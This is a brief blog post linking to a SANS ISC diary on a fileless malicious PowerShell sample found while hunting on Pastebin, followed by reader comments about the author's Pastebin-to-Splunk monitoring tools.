SANS ISC

[SANS ISC] Fileless Malicious PowerShell Sample

I published the following diary on isc.sans.org: “Fileless Malicious PowerShell Sample“:

Pastebin.com remains one of my favourite place for hunting. I’m searching for juicy content and report finding in a Splunk dashboard:

Yesterday, I found an interesting pastie with a simple Windows CMD script… [Read more]

4 comments

  1. Hi Xavier

    Yes please – I will be awaiting aggressively on this article then 🙂

    /Torben

  2. Hi Torben,
    Thank you for the feedback. The initial script that I wrote in 2012 is not maintained anymore and was not efficient! I’m a bad programmer 🙂
    Today, I’m generating the dashboard with, as you found it, Paste2SPlunk. It fetches pasties and sends the interesting ones directly to Splunk using the REST API.
    I should probably write an article about the setup…

  3. Hi Xavier

    As a regular reader of Internet Storm Center, this was another interesting post, so thanks for that and keep up the good work.

    I have a question about this post thu, as you start it with this info “Pastebin.com remains one of my favourite place for hunting. I’m searching for juicy content and report finding in a Splunk dashboard” – this sound brilliant.

    I found out that you back in 2012 made a script call Pastemon, but I don’t think this will work “out of the box” anymore as I can read that Pastebin had made some changes on how to send queries (You need an Pro account now) – so is it your Paste2Splunk python script that you are using today?

    So installation wise – Do I Git Clone your Paste2Splunk package and then take the settings.conf from PasterHunter package and drop it into your “Paste2Splunk” folder and disable “Outputs” other than Syslog – or?

    As I’m new to Splunk then the dashboard that you show in the post, how are this setup – is there an guide on how you set this up, or is there an Dashboard template that could be imported?

    Best Regards

    Torben

Leave a Reply

Your email address will not be published. Required fields are marked *